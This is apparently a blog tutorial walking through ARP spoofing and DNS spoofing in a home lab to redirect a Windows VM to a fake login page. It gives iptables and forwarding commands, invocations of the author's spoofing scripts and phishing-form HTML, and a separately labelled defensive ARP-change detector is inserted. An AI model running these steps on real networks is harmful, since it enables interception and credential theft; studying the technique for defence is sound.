DNS spoofing by example — Part 6

Maksym Postument
Sep 4, 2018 · 3 min read

Hello friends, today we are going to use the previously created ARP spoofer and DNS spoofer to perform an attack on the target.

My environment contains a Kali Linux VM (hacker) and a Windows 10 VM (target).

As usual, to perform a man-in-the-middle attack we need an ARP spoofer, which lets us receive all of the target's packets.

The first thing to do is enable IP forwarding. Execute this command on your Linux VM:

echo 1 > /proc/sys/net/ipv4/ip_forward

A Netfilter queue should also be created. This lets us catch and edit packets before they are sent to the target:

iptables -I FORWARD -j NFQUEUE --queue-num 0

Let’s check the ARP table before executing the ARP spoofer:

Let’s execute the ARP spoofer:

python arp_spoofing.py -t 10.0.2.4 -g 10.0.2.1
[+] Packets sent: 4^

Where -t 10.0.2.4 is the target IP address and -g 10.0.2.1 is the gateway IP address.

And check the ARP table one more time:

The gateway MAC address was replaced with the hacker's MAC address, and now the hacker will receive all of the target's packets.
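The ARP table change described above is also what a defender can check for on the target. The following is an added example, not code from the original post or its repository: it parses Windows `arp -a` output and flags a gateway entry whose MAC changed or is shared with another host. The sample tables and MAC addresses are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample of `arp -a` on the Windows target; MAC addresses are made up.
ARP_BEFORE = """\
Interface: 10.0.2.4 --- 0x4
  Internet Address      Physical Address      Type
  10.0.2.1              52-54-00-12-35-00     dynamic
  10.0.2.15             08-00-27-aa-bb-cc     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""
# After spoofing, the gateway entry carries the Kali VM's MAC (constructed).
ARP_AFTER = ARP_BEFORE.replace("52-54-00-12-35-00", "08-00-27-aa-bb-cc")

ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\b",
    re.I | re.M)

def parse_arp_table(text):
    """Return {ip: mac} for the unicast entries of Windows `arp -a` output."""
    table = {}
    for m in ROW.finditer(text):
        ip, mac = m.group(1), m.group(2).lower()
        # Broadcast/multicast MACs (low bit of first octet set) are shared legitimately.
        if int(mac[:2], 16) & 1:
            continue
        table[ip] = mac
    return table

def shared_macs(table):
    """Return {mac: [ips]} for every MAC claimed by more than one IP."""
    owners = defaultdict(list)
    for ip, mac in table.items():
        owners[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}

def gateway_alerts(baseline, current, gateway):
    """Compare the gateway entry with a known-good baseline table."""
    alerts = []
    old, new = baseline.get(gateway), current.get(gateway)
    if old and new and old != new:
        alerts.append(f"gateway {gateway} moved from {old} to {new}")
    for mac, ips in shared_macs(current).items():
        if gateway in ips:
            alerts.append(f"{mac} answers for {', '.join(ips)}")
    return alerts

if __name__ == "__main__":
    for a in gateway_alerts(parse_arp_table(ARP_BEFORE), parse_arp_table(ARP_AFTER), "10.0.2.1"):
        print("[!]", a)
```

A shared MAC can be legitimate (one device holding several addresses), so the baseline comparison is the stronger of the two signals.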

To finish the attack, a web server should be installed on Kali Linux and should contain a clone of the website whose credentials we are going to steal. Kali Linux has built-in tools to clone the login page of any website, but this is a topic for another post. For now, I am going to use just a simple page on an Apache server to demonstrate how the attack works.

Start the Apache server and add a simple HTML page to it:

systemctl start apache2

Add some content to /var/www/html/index.html. In a real attack, you will need to have a real copy of a website. I am going to use a simple form:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>devopslife.xyz</title>
</head>
<body>
<h1>This is real devopslife.xyz. Please enter your credentials. No one will get them</h1>
<form action="">
Username:<br>
<input type="text" name="Username">
<br>
Password:<br>
<input type="text" name="Password">
<br><br>
<input type="submit" value="Give credentials to hacker">
</form>
</body>
</html>

Let’s start the DNS spoofer:

python dns_spoof.py -w devopslife.xyz -i 10.0.2.15

After this script is executed, if the target tries to open devopslife.xyz, the request will be forwarded to the hacker's IP, 10.0.2.15. If the login page looks the same as the original devopslife.xyz page, it is hard to identify that someone is trying to hack you. Our page looks different, so it’s not hard to identify that something is wrong.

Let’s verify the result of the attack on the target VM. Open devopslife.xyz in a browser.

Code can be found on my Github — https://github.com/Infectsoldier/hacking_tools

Check my blog — http://www.devopslife.xyz
